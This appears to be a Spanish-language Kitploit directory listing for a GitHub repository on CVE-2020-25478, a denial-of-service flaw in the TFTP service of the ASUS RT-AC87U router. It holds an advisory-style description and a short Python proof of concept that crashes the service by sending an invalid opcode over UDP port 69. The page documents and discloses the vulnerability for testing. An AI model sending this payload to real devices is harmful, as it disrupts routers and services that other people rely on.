Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack — ASUS RT-AC87U TFTP es vulnerable a ataques de Denegación de Servicio (DoS) | Kitploit
Herramientas/GitHubGitHub/santokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack
Análisis de VulnerabilidadesExplotaciónFuzzingSeguridad de Hardware e IoT
GitHubsantokum/cve-2020-25478--asus-rt-ac87u-tftp-is-vulnerable-to-denial-of-service-dos-attack

CVE-2020-25478--ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack

ASUS RT-AC87U TFTP es vulnerable a ataques de Denegación de Servicio (DoS)

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
hace 3 añosAún no revisado

ASUS-RT-AC87U-TFTP-is-vulnerable-to-Denial-of-Service-DoS-attack

CVE-2020-25478 - El servicio TFTP de ASUS RT-AC87U es vulnerable a un ataque de Denegación de Servicio (DoS)

  1. NOMBRE DE LOS PRODUCTOS AFECTADOS Y VERSIONES

ASUS RT-AC87U 3.0.0.4.382_51640

  1. TIPO DE PROBLEMA

Se relaciona principalmente con CWE-20; el servicio TFTP que se ejecuta en ASUS RT-AC87U es vulnerable a un ataque de Denegación de Servicio (DoS) cuando se envía un código de operación (opcode) no válido al servicio. El siguiente fragmento de código Python se utiliza para probar la vulnerabilidad:

root@kitploit:~
	import socket
	import sys
	tftpd = ('192.168.1.1', 69)
	#Try and open an UDP SOCKET
	try:
	tftp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	except:
	print("Failed on socket creation, so exiting")
	sys.exit(1)
	#create a invalid opcode exeeding the 2 byte length
	# opcode operation
	# 1 Read request (RRQ)
	# 2 Write request (WRQ)
	# 3 Data (DATA)
	# 4 Acknowledgment (ACK)
	# 5 Error (ERROR)
	invalidOpcode = "0000"
	tftp.sendto(invalidOpcode,tftpd)

3. DESCRIPCIÓN

La versión 3.0.0.4.382_51640 del Asus RT-AC87U es vulnerable a un ataque de denegación de servicio en el servicio TFTP, lo que provoca que el servicio TFTP se bloquee. El servicio TFTP es propenso a bloquearse de forma remota mediante el envío de un código de operación (opcode) no válido.

https://www.asus.com/content/ASUS-Product-Security-Advisory/

Descargar herramienta